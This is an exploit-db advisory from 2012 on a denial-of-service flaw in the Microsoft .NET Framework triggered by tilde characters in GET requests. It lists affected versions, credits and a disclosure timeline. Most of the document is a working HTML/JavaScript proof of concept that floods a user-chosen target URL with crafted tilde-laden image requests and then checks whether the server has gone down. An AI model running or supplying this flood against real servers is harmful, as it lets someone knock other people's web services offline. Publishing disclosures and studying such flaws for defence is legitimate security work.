.NET Framework – Tilde Character Denial of Service

  • 作者: Soroush Dalili
    日期: 2012-07-04
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/19575/
  • Paper: http://www.exploit-db.com/docs/19527.pdf
    
    Security Research - .Net Framework Tilde Character DoS
    
    
    Website : http://soroush.secproject.com/blog/
    
    
    
    I. BACKGROUND
    ---------------------
    
    "The .NET Framework is a software framework developed by Microsoft that runs primarily on Microsoft Windows.
    It includes a large library and provides language interoperability
    across several programming languages." (Wikipedia)
    
    II. DESCRIPTION
    ---------------------
    
    Vulnerability Research Team discovered avulnerability
    in Microsoft .NET Framework.
    
    The vulnerability is caused by a tilde character "~" in a Get request, which could allow remote attackers
    to Deny the functionality of the server.
    
    
    III. AFFECTED PRODUCTS
    ---------------------------
    
    .Net Framework 1.0 Windows XP
    .Net Framework 1.1 Windows 2003
    .Net Framework 2.0 Windows 2003 R2
    .Net Framework 3.0 Windows 2008
    .Net Framework 3.5 Windows 2008 R2
    .Net Framework 4.0 Windows 2008 R2,Windows 7
    
    
    IV. Binary Analysis & Exploits/PoCs
    ---------------------------------------
    
    In-depth technical analysis of the vulnerability and a functional exploit
    are available through:
    
    http://soroush.secproject.com/blog/2012/06/microsoft-iis-tilde-character-vulnerabilityfeature-short-filefolder-name-disclosure/
    
    
    V. SOLUTION
    ----------------
    
    There are still workarounds through Vendor and security vendors.
    
    VI. CREDIT
    --------------
    
    This vulnerability was discovered by:
    
    Soroush Dalili (@irsdl)
    Ali Abbasnejad
    
    
    VII. REFERENCES
    ----------------------
    
    http://support.microsoft.com/kb/142982/en-us
    http://soroush.secproject.com/blog/2010/07/iis5-1-directory-authentication-bypass-by-using-i30index_allocation/
    
    VIII. DISCLOSURE TIMELINE
    -----------------------------
    
    2010-08-01 - Vulnerability Discovered
    2010-08-03 - Vendor Informed
    2010-12-01 - Vendor 1st Response
    2011-01-04 - Vendor 2nd Response (next version fix)
    2012-06-29 - Public Disclosure
    
    
    Proof of Concept:
    
    <html>
    <head>
    <script>
    var requestNumber = 10; // enough for the test - otherwise it may stop your .Net framework completely
    
    var tempValue = "A";
    while(tempValue.length<4000){ // 4096 then!
    tempValue+=tempValue;
    }
    
    var errorFlag;
    var from_time;
    var to_time;
    
    function testTheTarget(strTarget,intValidFolderCount,intLoopNumber,HTMLElementDest){
    HTMLElementDest.innerHTML = '';
    errorFlag = 0;
    from_time = new Date();
    from_time = from_time.getTime();
    if (isTargetValid(strTarget)){
    if (isNaN(intValidFolderCount)) intValidFolderCount = 100;
    if (isNaN(intLoopNumber)) intLoopNumber = 100;
    requestNumber = intLoopNumber;
    
    		var div = document.createElement("div");
    		
    for(var i=0; i<requestNumber;i++){
    var testTempValue = tempValue.substring(0,intValidFolderCount-1);
    testTempValue = testTempValue.replace(/A/gi,"/~"+Math.floor(Math.random()*10)+"");
    testTempValue+=".AsPx?aspxerrorpath=/";
    testTempValue="/"+(new Date()).getMilliseconds()+"~"+Math.floor(Math.random()*10) + testTempValue
    var img = createElement("img","img_"+i);
    if(i==requestNumber-1)
    {
    img.onerror = function(){
    to_time = new Date();
    to_time = to_time.getTime();
    var msecs = (to_time - from_time);
    if(!errorFlag && msecs < 100*requestNumber+5000){
    errorFlag = 1;
    if(intValidFolderCount>=150)
    alert('As you can see this message, you probably need to decrease the Maximum Valid Folder number.');
    else if(intValidFolderCount>=50){
    alert('First increase the Maximum Valid Folder number to see the behaviour, then decrease it to lower than '+intValidFolderCount+' and then see the behaviour.');
    }else
    alert('The response was too quick. This server probably is not vulnerable.');
    }}
    }
    img.src = strTarget + testTempValue;
    div.appendChild(img);
    }
    HTMLElementDest.appendChild(div);
    }else{
    alert('Your target URL is not valid. Examples: \nhttp://www.aspnet-example.com/ \nor \nhttps://www.aspnet-example.com/');
    }
    };
    
    var myTargetWindow;
    var objSetTimeout;
    function openInNewWin(strTarget){
    clearTimeout(objSetTimeout);
    if(isTargetValid(strTarget)){
    myTargetWindow = window.open(strTarget,'_blank');
    objSetTimeout = setTimeout('isServerAlive()',10000);
    }
    }
    
    function isServerAlive(){
    try{
    var dummy = myTargetWindow.location;
    if(myTargetWindow.location.toString().indexOf('//localhost') < 0)
    alert('No response from the server! Seems dead to me!');
    }catch(e){
    // Nothing ... it is alive and safe... 
    }
    }
    function isTargetValid(strTarget){
    var result = false;
    try{
    if(strTarget.substring(0,7).toLowerCase() == "http://" || strTarget.substring(0,8).toLowerCase() == "https://"){
    result = true;
    }
    }catch(e){}
    return result;
    };
    
    function createElement(elmType,elmName){
    var element;
    if(elmName=='')
    {
    element = document.createElement(elmType);
    } else
    {
    try
    {
    element = document.createElement('<'+elmType+' name="'+elmName+' id="'+elmName+'">');
    } catch (ex)
    {
    element = document.createElement(elmType);
    element.name=elmName;
    element.id=elmName;
    };
    };
    return element;
    };
    
    </script>
    </head>
    
    <body>
    You have to monitor the server performance manually:<br/>
    Target website: <input type="text" name="target" id="target" value="http://localhost/"/> Example: http://www.aspnet-example.com/ or https://www.aspnet-example.com/ - Do not include filename<br/>
    Maximum valid folder that can be added to your target: <input type="text" name="validfoldercount" id="validfoldercount" value="200"/> before receiving URL Too Long error<br/>
    Loop Number: <input type="text" name="loopnumber" id="loopnumber" value="100"/> be careful as it can kill your server.<br/>
    <input type="button" value="Test it" onclick="testTheTarget(document.getElementById('target').value,document.getElementById('validfoldercount').value,document.getElementById('loopnumber').value,document.getElementById('playground'))"/>
    <input type="button" value="Open the target website" onclick="openInNewWin(document.getElementById('target').value)"/><br/>
    <div style="visibility:hidden;" name="playground" id="playground">
    Hidden Div! -playground-
    </div>
    <br/><br/><br/><br/>
    We do not accept any responsibility for bad usage of this PoC. Please only run it against your own server/websites.
    <br/><br/>
    Main reference: <a href="http://soroush.secproject.com/blog/2012/06/microsoft-iis-tilde-character-vulnerabilityfeature-short-filefolder-name-disclosure/">http://soroush.secproject.com/blog/2012/06/microsoft-iis-tilde-character-vulnerabilityfeature-short-filefolder-name-disclosure/</a>
    </body>
    </html>